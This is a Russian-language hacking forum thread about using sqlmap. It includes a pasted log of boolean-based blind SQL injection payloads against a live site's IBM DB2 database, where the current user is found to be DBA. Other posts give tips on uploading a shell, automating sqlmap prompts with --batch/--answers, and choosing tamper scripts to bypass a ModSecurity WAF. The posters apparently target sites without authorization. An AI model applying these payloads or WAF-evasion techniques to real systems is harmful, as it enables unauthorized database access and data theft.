Вопросы по SQLMap

считаю если с прив все ок то помоему нельзя залиться только если не понятно почему не выдает пути к специальной папке вне корня надо инклуд или как еще отуда дальше) и откуда то

интересно мускуль еще не научился как то кампастить с отведенной папки то?)
ну тут или обойти исполнения или надо понять как можно обойти эту опцию)

 

Помогите раскрутить сайт
Parameter: SiteId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Vector: AND [INFERENCE]

Code:

[14:07:25] [INFO] the back-end DBMS is IBM DB2
back-end DBMS: IBM DB2
[14:07:25] [INFO] fetching current user
[14:07:25] [PAYLOAD] 200001
[14:07:25] [INFO] retrieving the length of query output
[14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
[14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
[14:07:29] [INFO] retrieved:
[14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
[14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
[14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
[14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
[14:07:36] [INFO] retrieved:
[14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
current user:   None
[14:07:36] [INFO] testing if current user is DBA
current user is DBA:    True
[14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[14:07:36] [INFO] fetching database (schema) names
[14:07:36] [INFO] fetching number of databases
[14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
[14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
[14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
[14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
[14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
[14:07:45] [INFO] retrieved:
[14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
[14:07:45] [ERROR] unable to retrieve the number of databases
[14:07:45] [INFO] falling back to current database
[14:07:45] [INFO] fetching current database
[14:07:45] [INFO] retrieving the length of query output
[14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
[14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
[14:07:48] [INFO] retrieved:
[14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
[14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
[14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
[14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
[14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
[14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
[14:07:59] [INFO] retrieved:
[14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
[14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:07:59] [CRITICAL] unable to retrieve the database names

[*] shutting down at 14:07:59

пробывал --hex, --no-cast, не помогает

 

Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.

 

@aZohan

обычно

file:///хоум фолдер/.sqlmap/output

 

session.sqlite

не?

 

вы имеете ввиду предыдущую сессию? Не совсем понял вас. Вот еще что думаю, юзаю предустановленный софт sqlmap, может лучше будет склонировать его с git's ?

 

--flush-session Flush session files for current target
--fresh-queries Ignore query results stored in session file
Заглядывайте чаще в мануал

 

Всем доброго время суток! По вашему мнению, что лучше использовать: предустановленный sqlmap в kali linux или лучше склонировать с github?

 

apt-get update && apt-get upgrade && apt-get dist-upgrade

 

а зачем всё это в бэкграунде выполнять?

 

Схлопнул второй амперсанд.

 

Благодарю за ответ. Ежедневно выполняю следующие команды: sudo apt update, sudo apt upgrade. Разницы же нет у команд: sudo apt upgrade, sudo apt full-upgrade и sudo apt dist-upgrade?

 

Разница есть, но не в данном случае.

 

Ребят сори за тупой вопрос

возможно ли мепу задать через команду
--batch что бы сначала он сам задавал ответ "N" , но если идет крит подключения , от дампа , он сам отвечал "Y"

 

--answers=ANSWERS Set question answers (e.g. "quit=N,follow=N")
Там куча разных условий ответа!
Пример:
--batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"

 

Спасибо так намного проще )

 

Всем доброго времени суток, может кто подсказать какой тампер против этого waf идёт "[CRITICAL] WAF/IPS/IDS identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'"
Заранее благодарен.

 

Попробуй:

Code:

--tamper "modsecurityzeroversioned.py"

 

буду пробовать эти:
modsecurityversioned.py окружает полный запрос комментариями
modsecurityzeroversioned.py окружает комментарии, "0" полным запросом

 

Вообще суть тамперов, как они работают можно посмотреть в папке sqlmap'a tamper, частенько бывает что в наборе нету нужного, тогда изучаем суть WAF'a, создаем свой тампер и кладем в папочку, дальше просто его подключаем.